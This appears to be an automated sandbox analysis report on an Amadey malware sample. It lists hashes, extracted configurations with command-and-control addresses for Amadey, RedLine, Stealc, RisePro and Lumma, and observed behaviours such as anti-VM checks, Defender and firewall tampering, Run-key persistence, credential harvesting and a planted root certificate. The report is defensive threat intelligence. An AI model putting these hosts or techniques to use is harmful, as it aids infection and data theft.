amadey | 61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9

Resubmissions

12-05-2024 18:35

240512-w8s1yaae81 10

12-05-2024 09:37

240512-llkqyada69 10

Analysis

max time kernel
148s
max time network
387s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-05-2024 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
Size

1.8MB
MD5

7f38c9925572a5fa738c2c6bf365c0e6
SHA1

5ff3a27bf6e2281eee612accd20b0502a51ded70
SHA256

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9
SHA512

9caa41001535df15c566e8502860ca4ad1cf1df6c150771e5cb63bc08e5b585b4cef0c52af625deb1f62a56a3da79a0a17a698b56ab1cd298c1cdc0b64ca7fd8
SSDEEP

24576:Rl5JMeP7S5sNnzhAKm8WUlYvjh58KqQkvRLP5aESgEaWXeEB54+6k2Lxpxn2yjg9:7E5s/I8N4jD85vVHZSe+54+7apxry+b

Malware Config

Extracted

Family

amadey

Version

4.20

http://5.42.96.141

http://5.42.96.7

Attributes

install_dir
908f070dff
install_file
explorku.exe
strings_key
b25a9385246248a95c600f9a061438e1
url_paths
/go34ko8/index.php

rc4.plain

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

stealc

http://49.13.229.86

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

lumma

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

https://smallelementyjdui.shop/api

https://sofaprivateawarderysj.shop/api

https://lineagelasserytailsd.shop/api

https://tendencyportionjsuk.shop/api

https://headraisepresidensu.shop/api

https://appetitesallooonsj.shop/api

https://minorittyeffeoos.shop/api

https://prideconstituiiosjk.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1272-96-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000800000001abad-121.dat	family_zgrat_v1
behavioral1/memory/2288-140-0x0000000000380000-0x0000000000440000-memory.dmp	family_zgrat_v1
behavioral1/memory/5996-594-0x000001DC5C380000-0x000001DC5FBB4000-memory.dmp	family_zgrat_v1
behavioral1/memory/5996-614-0x000001DC7A4C0000-0x000001DC7A5CA000-memory.dmp	family_zgrat_v1
behavioral1/memory/5996-621-0x000001DC61A60000-0x000001DC61A84000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000a00000001ac9f-2454.dat	family_zgrat_v1

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

WrYwfd7W6pgYfjomXLgcNAj2.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	WrYwfd7W6pgYfjomXLgcNAj2.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x000800000001aba5-120.dat	family_redline
behavioral1/files/0x000800000001abad-121.dat	family_redline
behavioral1/memory/3348-122-0x0000000000A80000-0x0000000000AD2000-memory.dmp	family_redline
behavioral1/files/0x000800000001abb1-128.dat	family_redline
behavioral1/memory/2288-140-0x0000000000380000-0x0000000000440000-memory.dmp	family_redline
behavioral1/memory/3456-138-0x0000000000300000-0x0000000000352000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/files/0x000700000001abfd-346.dat	family_xmrig
behavioral1/files/0x000700000001abfd-346.dat	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplons.exeWrYwfd7W6pgYfjomXLgcNAj2.exeaxplons.exe3b9f6efab5.exeaxplons.exeexplorku.exeexplorku.exe61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeexplorku.exeamers.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WrYwfd7W6pgYfjomXLgcNAj2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3b9f6efab5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorku.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amers.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 37 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exe

pid	Process
5724	powershell.exe
2020	powershell.exe
4432	powershell.exe
5188	powershell.exe
6848	powershell.exe
3300	powershell.exe
7328	powershell.exe
5776	powershell.exe
4764	powershell.exe
5244	powershell.exe
6428	powershell.exe
5360	powershell.exe
7488	powershell.exe
2268	powershell.exe
6160	powershell.exe
5192	powershell.exe
7060	powershell.exe
5764	powershell.exe
5708	powershell.exe
5224	powershell.exe
5228	powershell.exe
7912	powershell.exe
6836	powershell.exe
6676	powershell.exe
8040	powershell.exe
7028	powershell.exe
5740	powershell.exe
3164	powershell.exe
1076	powershell.exe
7080	powershell.exe
7056	powershell.exe
1844	powershell.exe
1836	powershell.exe
6860	powershell.exe
2956	powershell.EXE
7240	powershell.exe
6848	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
7584	netsh.exe
6600	netsh.exe
2268	netsh.exe
7556	netsh.exe
5156	netsh.exe
1956	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/files/0x000a00000001ac9f-2454.dat	net_reactor

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exeamers.exeaxplons.exeexplorku.exeWrYwfd7W6pgYfjomXLgcNAj2.exeInstall.exeaxplons.exe3b9f6efab5.exe61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeexplorku.exeexplorku.exeaxplons.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amers.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WrYwfd7W6pgYfjomXLgcNAj2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WrYwfd7W6pgYfjomXLgcNAj2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3b9f6efab5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3b9f6efab5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorku.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe

Executes dropped EXE 64 IoCs

Processes:

explorku.exeamers.exeaxplons.exe3b9f6efab5.exeinstaller.exealex.exegold.exekeks.exetrf.exeredline1.exeinstall.exeswizzhis.exeGameService.exeGameService.exelumma1.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exePiercingNetLink.exeGameService.exeGameService.exePiercingNetLink.exeGameService.exeGameService.exeGameSyncLinks.exeGameSyncLink.exeaxplons.exeexplorku.exeGameSyncLinks.exePiercingNetLink.exeGameSyncLinks.exeGameSyncLink.exePiercingNetLink.exeGameSyncLinks.exeGameSyncLink.exefile300un.exeNewB.exePiercingNetLink.exeISetup8.exeGameSyncLinks.exetoolspub1.exe4767d2e713f2021e8fe856e3ea638b58.exeu1y8.0.exeu1y8.1.exeaxplons.exeexplorku.exeNewB.exeGameSyncLink.exePiercingNetLink.exeGameSyncLinks.exeN41fo8smcTtS1Wyi0KvKJiCG.exebgt5XHyfmw2KKbaH1wRzpx8B.exeeh3nceepcFL8F4a9sIbYDI3p.exe7XKobIkUf4xDjA7kpRLBYkTM.exeWrYwfd7W6pgYfjomXLgcNAj2.exeU5bwBTogwsYoizFTAQkxSglh.exeInstall.exe

pid	Process
652	explorku.exe
2248	amers.exe
2360	axplons.exe
3608	3b9f6efab5.exe
4164	installer.exe
2112	alex.exe
1868	gold.exe
3348	keks.exe
2288	trf.exe
3456	redline1.exe
4640	install.exe
356	swizzhis.exe
4528	GameService.exe
3400	GameService.exe
224	lumma1.exe
4452	GameService.exe
4060	GameService.exe
4604	GameService.exe
4860	GameSyncLink.exe
4412	GameService.exe
2248	GameService.exe
3400	GameService.exe
2540	GameService.exe
4420	GameService.exe
704	GameSyncLink.exe
1032	PiercingNetLink.exe
4132	GameService.exe
1092	GameService.exe
4372	PiercingNetLink.exe
4340	GameService.exe
808	GameService.exe
4700	GameSyncLinks.exe
2084	GameSyncLink.exe
324	axplons.exe
528	explorku.exe
3400	GameSyncLinks.exe
4480	PiercingNetLink.exe
5060	GameSyncLinks.exe
4528	GameSyncLink.exe
4132	PiercingNetLink.exe
3220	GameSyncLinks.exe
2352	GameSyncLink.exe
1912	file300un.exe
4336	NewB.exe
2992	PiercingNetLink.exe
2528	ISetup8.exe
2880	GameSyncLinks.exe
3364	toolspub1.exe
2128	4767d2e713f2021e8fe856e3ea638b58.exe
1384	u1y8.0.exe
3000	u1y8.1.exe
5432	axplons.exe
5440	explorku.exe
5624	NewB.exe
5456	GameSyncLink.exe
5556	PiercingNetLink.exe
5660	GameSyncLinks.exe
5696	N41fo8smcTtS1Wyi0KvKJiCG.exe
5440	bgt5XHyfmw2KKbaH1wRzpx8B.exe
1112	eh3nceepcFL8F4a9sIbYDI3p.exe
2256	7XKobIkUf4xDjA7kpRLBYkTM.exe
6028	WrYwfd7W6pgYfjomXLgcNAj2.exe
6096	U5bwBTogwsYoizFTAQkxSglh.exe
3944	Install.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplons.exeexplorku.exe61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeexplorku.exeamers.exeaxplons.exeaxplons.exeexplorku.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	explorku.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	explorku.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	amers.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Wine	explorku.exe

Loads dropped DLL 4 IoCs

Processes:

RegAsm.exeu1y8.0.exe

pid	Process
5088	RegAsm.exe
5088	RegAsm.exe
1384	u1y8.0.exe
1384	u1y8.0.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 17 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/files/0x000800000001ab86-49.dat	themida
behavioral1/memory/3608-57-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-60-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-58-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-61-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-59-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-62-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-63-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-65-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-64-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-273-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-325-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-381-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-450-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-485-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/3608-495-0x0000000000C70000-0x0000000001302000-memory.dmp	themida
behavioral1/memory/6028-760-0x0000000140000000-0x0000000140B56000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

3b9f6efab5.exeexplorku.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe"	3b9f6efab5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\3b9f6efab5.exe = "C:\\Users\\Admin\\1000006002\\3b9f6efab5.exe"	explorku.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\installer.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000011001\\installer.exe"	explorku.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

WrYwfd7W6pgYfjomXLgcNAj2.exe3b9f6efab5.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WrYwfd7W6pgYfjomXLgcNAj2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3b9f6efab5.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
119	pastebin.com
120	pastebin.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
71	ipinfo.io
161	api.myip.com
162	api.myip.com
163	ipinfo.io
164	ipinfo.io
322	ipinfo.io
323	ipinfo.io
70	ipinfo.io

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral1/files/0x000700000001ac66-1217.dat	autoit_exe

Drops file in System32 directory 4 IoCs

Processes:

WrYwfd7W6pgYfjomXLgcNAj2.exe

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy	WrYwfd7W6pgYfjomXLgcNAj2.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	WrYwfd7W6pgYfjomXLgcNAj2.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	WrYwfd7W6pgYfjomXLgcNAj2.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	WrYwfd7W6pgYfjomXLgcNAj2.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

Processes:

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeexplorku.exeamers.exeaxplons.exeaxplons.exeexplorku.exeaxplons.exeexplorku.exeWrYwfd7W6pgYfjomXLgcNAj2.exe

pid	Process
2836	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
652	explorku.exe
2248	amers.exe
2360	axplons.exe
324	axplons.exe
528	explorku.exe
5432	axplons.exe
5440	explorku.exe
6028	WrYwfd7W6pgYfjomXLgcNAj2.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

alex.exegold.exeswizzhis.exelumma1.exepowershell.exe

description	pid	Process	procid_target
PID 2112 set thread context of 1272	2112	alex.exe	80
PID 1868 set thread context of 2540	1868	gold.exe	123
PID 356 set thread context of 5088	356	swizzhis.exe	100
PID 224 set thread context of 3952	224	lumma1.exe	109
PID 4764 set thread context of 5208	4764	powershell.exe	188

Drops file in Program Files directory 14 IoCs

Processes:

install.exe

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe

Drops file in Windows directory 2 IoCs

Processes:

61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exeamers.exe

description	ioc	Process
File created	C:\Windows\Tasks\explorku.job	61079bbfcf63859a57e3e30f783c168199942ce7a4cbd7331954c375c9cf9df9.exe
File created	C:\Windows\Tasks\axplons.job	amers.exe

Launches sc.exe 15 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
4760	sc.exe
5388	sc.exe
6516	sc.exe
6176	sc.exe
7048	sc.exe
5140	sc.exe
4336	sc.exe
1716	sc.exe
3644	sc.exe
2796	sc.exe
7012	sc.exe
7080	sc.exe
4108	sc.exe
5916	sc.exe
5856	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
4648	2112	WerFault.exe	79
4060	3364	WerFault.exe	172

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub1.exeu1y8.1.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1y8.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1y8.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1y8.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RegAsm.exeu1y8.0.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1y8.0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1y8.0.exe

Creates scheduled task(s) 1 TTPs 29 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
3652	schtasks.exe
5636	schtasks.exe
5112	schtasks.exe
1956	schtasks.exe
6968	schtasks.exe
7028	schtasks.exe
1688	schtasks.exe
7820	schtasks.exe
7792	schtasks.exe
6912	schtasks.exe
6776	schtasks.exe
6140	schtasks.exe
7012	schtasks.exe
1628	schtasks.exe
7104	schtasks.exe
2312	schtasks.exe
6380	schtasks.exe
512	schtasks.exe
4996	schtasks.exe
7064	schtasks.exe
7268	schtasks.exe
6352	schtasks.exe
4120	schtasks.exe
6200	schtasks.exe
6676	schtasks.exe
7284	schtasks.exe
6484	schtasks.exe
7680	schtasks.exe
7272	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exeInstall.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

keks.exe

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	